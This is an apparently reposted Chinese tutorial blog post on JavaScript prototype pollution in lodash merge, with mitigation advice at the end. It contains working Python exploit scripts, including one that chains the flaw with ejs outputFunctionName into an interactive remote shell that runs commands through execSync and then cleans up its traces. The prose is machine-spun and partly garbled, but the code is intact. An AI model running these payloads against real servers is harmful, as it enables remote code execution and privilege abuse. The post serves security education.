前端原型链污染漏洞竟可以拿下服务器shell?

前端 2023-07-05 17:29:38
322阅读

做为前端工程师者,某一天不经意碰到了原型链环境污染系统漏洞,本来认为没什么危害,求知欲迫使下,顺藤摸瓜,发觉原型链环境污染系统漏洞居然还可以拿到网络服务器的shell管理员权限,不得不注意!

某天正全力的coding,智能机器人给发过那样一条信息

查询发觉是一个叫“原型链环境污染”(Prototype chain pollution)的系统漏洞,还行这仅仅 dev 依靠,当今作用下基本上没有什么危害,其修补方法能够根据更新包版本号就可以。

“原型链环境污染”系统漏洞,看上去好高端大气的名称,和“互联网技术暗语”有得一拼,求知欲迫使下,顺藤摸瓜地科学研究一番。

现阶段该系统漏洞危害了架构常见的有:

  • Lodash <= 4.15.11
  • Jquery < 3.4.0
  • ...

0x00 同学们完成一下目标的合拼?

招聘者让被招聘面试的同学们写个目标合拼,该同学们一听这难题,就这,就这,30s就写好啦一份运用递归算法完成的目标合拼,编码以下:

 
  1. function merge(target, source) { 
  2.     for (let key in source) { 
  3.         if (key in source && key in target) { 
  4.             merge(target[key], source[key]) 
  5.         } else { 
  6.             target[key] = source[key
  7.         } 
  8.     } 

但是招聘面试的同学们不清楚,他完成的编码,会埋下一个原型链环境污染的系统漏洞,大伙儿下一次招聘面试新同学们的情况下,能够问一问了

为什么会出现原型链环境污染系统漏洞?

那麼下面,我们一起从入门到精通地认识一下原型链系统漏洞,便于于在日常开发设计全过程中就避开掉这种很有可能的风险性。

0x01 JavaScript中的原型链

1.1 基本要素

在javaScript中,案例目标与原形中间的连接,称为原型链。其基本上观念是运用原形让一个引用类型承继另一个引用类型的特性和方式 。随后层层递进,就组成了案例与原形的传动链条,这就是说白了原型链的基本要素。

三个专有名词:

隐式原形:全部引用类型(涵数、二维数组、目标)都是有 __proto__ 特性,比如arr.__proto__

显式原形:全部涵数有着prototype特性,比如:func.prototype

原形目标:有着prototype特性的目标,在界定涵数时被建立

原型链中间的关联能够参照图1.1:

图1.1 原型链关系图

1.2 原型链搜索体制

当一个自变量在启用某方式 或特性时,假如当今自变量并沒有该方式 或特性,便会在该自变量所属的原型链中先后往上搜索是不是存有该方式 或特性,如果有则启用,不然回到undefined

1.3 哪儿会采用

在开发设计中,经常会采用 toString()、valueOf()等方式 ,array种类的自变量有着大量的方式 ,比如forEach()、map()、includes()这些。比如申明了一个arr二维数组种类的自变量,arr自变量却能够启用如下图中仍未界定的方式 和特性。

根据自变量的隐式原形能够查询到,二维数组种类自变量的原形中早已界定了这种方式 。比如某自变量的种类是Array,那麼它就可以根据原型链搜索体制,启用相对应的方式 或特性。

1.4 风险防控措施剖析&原型链环境污染系统漏洞基本原理

最先看一个简易的事例:

 
  1. var a = {name'dyboy', age: 18}; 
  2. a.__proto__.role = 'administrator' 
  3. var b = {} 
  4. b.role    // output: administrator 

具体运作結果以下:

运作結果

能够发觉,给隐式原形提升了一个role的特性,而且取值为administrator(管理人员)。在创建对象一个新目标b的情况下,尽管沒有role特性,可是根据原型链能够载入到根据目标a在原型链上取值的‘administrator’。

难题就来了,__proto__偏向的原形目标是可写应写的,假如根据一些实际操作(多见于merge,clone等方式 ),促使网络黑客能够增、删、改原型链上的方式 或特性,那麼程序流程就很有可能会因为原型链环境污染而遭受DOS、滥用权力等进攻

0x02 Demo演试 & 组合策略

2.1 Demo演试

Demo应用koa2来完成的服务器端:

 
  1. const Koa = require("koa"); 
  2. const bodyParser = require("koa-bodyparser"); 
  3. const _ = require("lodash"); 
  4.  
  5. const app = new Koa(); 
  6. app.use(bodyParser()); 
  7.  
  8. // 合拼涵数 
  9. const combine = (payload = {}) => { 
  10.   const prefixPayload = { nickname: "bytedanceer" }; 
  11.   // 使用方法可参照:https://lodash.com/docs/4.17.15#merge 
  12.   _.merge(prefixPayload, payload); 
  13.   // 此外别的也存在的问题的涵数:merge defaultsDeep mergeWith 
  14. }; 
  15.  
  16. app.use(async (ctx) => { 
  17.   // 某业务场景下,合拼了客户递交的payload 
  18.   if(ctx.method === 'POST') { 
  19.     combine(ctx.request.body); 
  20.   } 
  21.   // 某网页页面某点逻辑性 
  22.   const user = { 
  23.     username: "visitor"
  24.   }; 
  25.   let welcomeText = "同学们,健身游泳,了解一下?"
  26.   // 因user.role不会有,因此 恒为假(false),在其中编码不太可能实行 
  27.   if (user.role === "admin") { 
  28.     welcomeText = "尊重的VIP,您来了!"
  29.   } 
  30.   ctx.body = welcomeText; 
  31. }); 
  32. app.listen(3001, () => { 
  33.   console.log("Running: http://localohost:3001"); 
  34. }); 

当一个游人客户浏览网站地址:http://127.0.0.1:3001/ 时,网页页面会表明“同学们,健身游泳,了解一下?”

能够见到在编码中应用了loadsh(4.17.10版本号)的merge()涵数,将客户的payload和prefixPayload干了合拼。

乍一看,好像并没什么难题,针对业务流程好像也不会造成什么问题,不管客户浏览全都应当总是回到“同学们,健身游泳,了解一下?”他们,程序流程上user.role是一个恒为undefined的标准,则始终不容易实行if分辨体里的编码。

殊不知应用独特的payload检测,也就是运作一下大家的attack.py脚本制作

在我们再浏览http://127.0.0.1:3001时,会发觉回到的結果以下:

一瞬间变成了健身会所的VIP是吧,能够开心白给了?这时,不管哪些客户浏览这一网站地址,回到的网页页面都是会是表明如上結果,每个人VIP时期。如果是咱写的编码线上上发生这难题,【事故通报】了解一下。

attact.py 的编码以下:

 
  1. import requests 
  2. import json 
  3. req = requests.Session() 
  4. target_url = 'http://127.0.0.1:3001' 
  5. headers = {'Content-type''application/json'
  6. # payload = {"__proto__": {"role""admin"}} 
  7. payload = {"constructor": {"prototype": {"role""admin"}}} 
  8. res = req.post(target_url, data=json.dumps(payload),headers=headers) 
  9. print('进攻进行!'

进攻编码中的payload:{"constructor": {"prototype": {"role": "admin"}}} 根据merge()涵数完成合拼取值,另外,因为payload设定了constructor,merge的时候会给原形目标提升role特性,且初始值为admin,因此 浏览的客户变成了“VIP”

2.2 剖析一下loadsh中merge涵数的完成

剖析的lodash版本号4.17.10(有兴趣的同学们能够取得源代码自身手动式追朔👀)node_modules/lodash/merge.js中根据启用了baseMerge(object, source, srcIndex)涵数 则精准定位到:node_modules/lodash/_baseMerge.js 第20行的baseMerge涵数

 
  1. function baseMerge(object, source, srcIndex, customizer, stack) { 
  2.   if (object === source) { 
  3.     return
  4.   } 
  5.   baseFor(source, function(srcValue, key) { 
  6.     // 假如合拼的特性值是目标 
  7.     if (isObject(srcValue)) { 
  8.       stack || (stack = new Stack); 
  9.       // 启用 baseMerge 
  10.       baseMergeDeep(object, source, key, srcIndex, baseMerge, customizer, stack); 
  11.     } 
  12.     else { 
  13.       var newValue = customizer 
  14.         ? customizer(safeGet(object, key), srcValue, (key   ''), object, source, stack) 
  15.         : undefined; 
  16.       if (newValue === undefined) { 
  17.         newValue = srcValue; 
  18.       } 
  19.       assignMergeValue(object, key, newValue); 
  20.     } 
  21.   }, keysIn); 

关心到safeGet的涵数:

 
  1. function safeGet(object, key) { 
  2.   return key == '__proto__' 
  3.     ? undefined 
  4.     : object[key]; 

这也是为什么上边的payload为何没应用__proto__只是应用了相当于这一特性的构造方法的prototype

有payload是一个目标因而精准定位到node_modules/lodash/_baseMergeDeep.js第32行:

 
  1. function baseMergeDeep(object, source, key, srcIndex, mergeFunc, customizer, stack) { 
  2.   var objValue = safeGet(object, key), 
  3.       srcValue = safeGet(source, key), 
  4.       stacked = stack.get(srcValue); 
  5.   if (stacked) { 
  6.     assignMergeValue(object, key, stacked); 
  7.     return
  8.   } 

精准定位涵数assignMergeValue 于 node_modules/lodash/_assignMergeValue.js第13行

 
  1. function assignMergeValue(object, key, value) { 
  2.   if ((value !== undefined && !eq(object[key], value)) || 
  3.       (value === undefined && !(key in object))) { 
  4.     baseAssignValue(object, key, value); 
  5.   } 

再精准定位baseAssignValue于node_modules/lodash/_baseAssignValue.js第12行

 
  1. function baseAssignValue(object, key, value) { 
  2.   if (key == '__proto__' && defineProperty) { 
  3.     defineProperty(object, key, { 
  4.       'configurable'true
  5.       'enumerable'true
  6.       'value': value, 
  7.       'writable'true 
  8.     }); 
  9.   } else { 
  10.     object[key] = value; 
  11.   } 

绕开了if分辨,随后进到else逻辑性中,是一个简易的立即取值实际操作,仍未对constructor和prototype开展分辨,因而就拥有:

 
  1. prefixPayload = { nickname: "bytedanceer" }; 
  2. // payload:{"constructor": {"prototype": {"role""admin"}}} 
  3. _.merge(prefixPayload, payload); 
  4. // 随后就给原形目标取值了一个名叫role,数值admin的特性 

因此造成了客户会进到一个不太可能进到的逻辑性里,也就导致了上边发生的“滥用权力”难题。

2.3 系统漏洞组合策略,拿到网络服务器管理权限

从上边的Demo实例中,你很有可能会有一种幻觉:原型链系统漏洞好像并没什么很大的危害,是否不用特别关心(相比于sql注入,xss,csrf等系统漏洞)。

真的是那样吗?看来一个略微改动了的另一个事例(提升应用了ejs3D渲染模块),以原型链环境污染系统漏洞为基本,我们一起拿到网络服务器的shell!

 
  1. const express = require('express'); 
  2. const bodyParser = require('body-parser'); 
  3. const lodash = require('lodash'); 
  4. const app = express(); 
  5. app 
  6.     .use(bodyParser.urlencoded({extended: true})) 
  7.     .use(bodyParser.json()); 
  8. app.set('views''./views'); 
  9. app.set('view engine''ejs'); 
  10. app.get("/", (req, res) => { 
  11.     let title = '游人您好'
  12.     const user = {}; 
  13.     if(user.role === 'vip') { 
  14.         title = 'VIP您好'
  15.     } 
  16.     res.render('index', {title: title}); 
  17. }); 
  18. app.post("/", (req, res) => { 
  19.     let data = {}; 
  20.     let input = req.body; 
  21.     lodash.merge(data, input); 
  22.     res.json({message: "OK"}); 
  23. }); 
  24. app.listen(8888, '0.0.0.0'); 

该事例根据express ejs lodash,同样,浏览localhost:8888也是总是表明游人您好,跟上面一样能够应用原型链进攻,促使“每个人VIP”,但不但仅限于此,大家还能够深层次运用,依靠ejs的3D渲染及其包括原型链环境污染系统漏洞的lodash就可以完成RCE(Remote Code Excution,远程控制代码执行)

先看一下我们可以完成的进攻实际效果:

能够见到,依靠attack.py脚本制作,我们可以实行随意的shell指令,于此同时大家还确保了不容易危害普通用户(管理人员没法随便认知侵入),在下面的状况网络黑客便会常识问题地开展提权、管理权限保持、横着渗入等进攻,以获得更高权益,但此外,也会给公司产生更高损害。

上边的进攻方式 ,是根据loadsh的原型链环境污染系统漏洞和ejs模版3D渲染相互配合产生的编码引入,从而产生伤害更高的RCE系统漏洞。

下面看一下产生系统漏洞的缘故:

1.打断点调试render方法

2.进到render方法,将options和模版名发送给app.render()

3.获得到相匹配的3D渲染模块ejs

4.进到一个错误处理

5.再次

6.根据模版文档3D渲染

7.解决缓存文件,这一涵数也没啥能够运用的地区

8.总算赶到模版编译程序的地区了

9.再次冲

10.总算进到ejs杜兰特了

在这个文档之中,发觉第578行的opts.outputFunctionName是一undefined的值,假如该特性值存有,那麼就拼凑到自变量prepended中,以后的第597行能够见到,做为了輸出源代码的一部分

在697行,将拼凑的源代码,放进了调用函数中,随后回到该调用函数

11.在tryHandleCache中启用了该调用函数

最终完成了3D渲染輸出到手机客户端。

能够发觉在第10流程中,第578行的opts.outputFunctionName是一undefined的值,大家根据目标原型链取值一个js代码,那麼它便会拼凑到编码中(编码引入),而且在免费模板3D渲染的全过程中会实行该js代码。

在nodejs自然环境下,能够依靠其可启用系统软件方式 编码拼凑到该3D渲染调用函数中,做为涵数体传送给调用函数,那麼就可以完成远程控制随意代码执行,也就是上边演试的实际效果,客户能够实行随意DOS命令。

2.4 雅致地完成一个进攻脚本制作

雅致的地区就取决于,让管理人员和普通用户基本上不容易有认知,可以鬼鬼祟祟拿到网络服务器的shell。

Exploit详细脚本制作以下:

 
  1. import requests 
  2. import json 
  3.  
  4. req = requests.Session() 
  5.  
  6. target_url = 'http://127.0.0.1:8888' 
  7.  
  8. headers = {'Content-type''application/json'
  9.  
  10. # 失效进攻 
  11. # payload = {"__proto__": {"role""vip"}} 
  12.  
  13. # 一般的逻辑性进攻 
  14. payload = {"content":{"constructor": {"prototype": {"role""vip"}}}} 
  15.  
  16. # RCE进攻 
  17. # payload = {"content":{"constructor": {"prototype": {"outputFunctionName""a; return global.process.mainModule.constructor._load('child_process').execSync('ls /'); //"}}}} 
  18.  
  19. # 反跳shell,例如反跳到MSF/CS上 
  20.  
  21. # 仿真模拟一个互动式shell 
  22. if __name__ == "__main__"
  23.     payload = '\{"content":\{"constructor": \{"prototype": \{"outputFunctionName": "a; return global.process.mainModule.constructor._load(\'child_process\').execSync(\'{}\'); //"\}\}\}\}' 
  24.     while(True): 
  25.         shell = input('shell: '
  26.         if shell == ''
  27.             continue 
  28.         if shell == 'exit'
  29.             break 
  30.         formatStr = "a; return global.process.mainModule.constructor._load('child_process').execSync('"   shell  "'); //" 
  31.         payload = {"content":{"constructor": {"prototype": {"outputFunctionName": formatStr}}}} 
  32.  
  33.         res = req.post(target_url, data=json.dumps(payload),headers=headers) 
  34.  
  35.         res2 = req.get(target_url) 
  36.  
  37.         print(res2.text) 
  38.  
  39.         # 解决印痕 
  40.         formatStr = "a; return delete Object.prototype['outputFunctionName']; //" 
  41.         payload = {"content":{"constructor": {"prototype": {"outputFunctionName": formatStr}}}} 
  42.         res = req.post(target_url, data=json.dumps(payload),headers=headers) 
  43.         req.get(target_url) 

0x03 怎样避开或修补系统漏洞

3.1 很有可能存有系统漏洞的情景

  • 目标复制
  • 目标合拼
  • 途径设定

3.2 怎样避开

最先,原型链的系统漏洞实际上必须网络攻击针对项目工程或是可以根据一些方式 (比如文档载入系统漏洞)获得到源代码,进攻的科学研究成本费较高,一般不必担心。但网络攻击很有可能会根据一些脚本制作开展大批量黑盒测试方法,或依靠一些工作经验或规律性,便可减少科学研究成本费,因此 也不可以随便忽视此难题。

  1. 立即更新包版本号:企业的产品研发管理体系中,安全运维参加全部全过程,在装包等实际操作时,会全自动开启检测服务,实际上就提示了开发人员很有可能存有有风险性的三方包,这就必须大伙儿立即升級相匹配的三方包到最新版本,或是试着更换更为安全性的包。
  2. 关键字过虑:融合系统漏洞很有可能存有情景,可以多关心下目标复制和合拼等代码块,是不是对于__proto__、constructor和prototype关键字做过虑。
  3. 应用hasOwnProperty来分辨特性是不是立即来自于总体目标,这一方式 会忽视从原型链上承继到的特性。
  4. 在解决 json 字符串数组时开展分辨,过虑比较敏感键名。
  5. 应用 Object.create(null) 建立沒有原形的目标。
  6. 用Object.freeze(Object.prototype)锁定Object的原形,使Object的原形没法被改动,留意该方式 是一个浅部锁定。

0x04 难题 & 探寻

4.1 大量难题

Q:为啥demo实例中payload中无需__proto__?

A:在我应用的loadsh库4.17.10版本号中,发觉对于__proto__关键字干了分辨和过虑,因而想起了根据浏览构造方法的prototype的方法绕开

Q:在Demo中,为何黑客攻击后,随意客户浏览全是VIP真实身份了?

A:JavaAcript是并行处理程序执行的,因此 原型链上的特性等同于是global,全部联接的客户都共享资源,当某一客户的实际操作更改了原型链上的內容,那麼全部来访者浏览程序流程的全是根据改动以后的原型链

4.2 探寻

做为安全性科学研究工作人员,上边演试的原型链系统漏洞看起来威协并不算太大,但事实上网络黑客的进攻通常是系统漏洞的组成,当一个轻危等级的系统漏洞,做为高风险系统漏洞的进攻的基本,那麼低危系统漏洞还能算作低危系统漏洞吗?这更必须安全性科学研究工作人员,不但要追求完美对高风险系统漏洞的发掘,还得提高对基本系统漏洞的探寻观念。

做为开发者,我们可以试着下,怎样依靠专用工具快速检测程序流程中是不是存有原型链环境污染系统漏洞,以期待提升企业程序的安全系数。幸运的是,在企业內部早已根据编译程序服务平台干了一些安全大检查,大伙儿能够提升针对安全性的认知度。

原型链环境污染的运用难度系数尽管很大,可是根据其特点,全部的开源系统库都是在npm上能够见到,假如故意的网络黑客,根据大批量检验开源系统库,而且根据收集特点,那麼他要想获得进攻目标程序的是不是引入具备系统漏洞的开源系统库也并不是是一件艰难的事儿。

那麼我们自己写一个脚本制作去Github刷上一波,也不是不好...

the end
免责声明:本文不代表本站的观点和立场,如有侵权请联系本站删除!本站仅提供信息存储空间服务。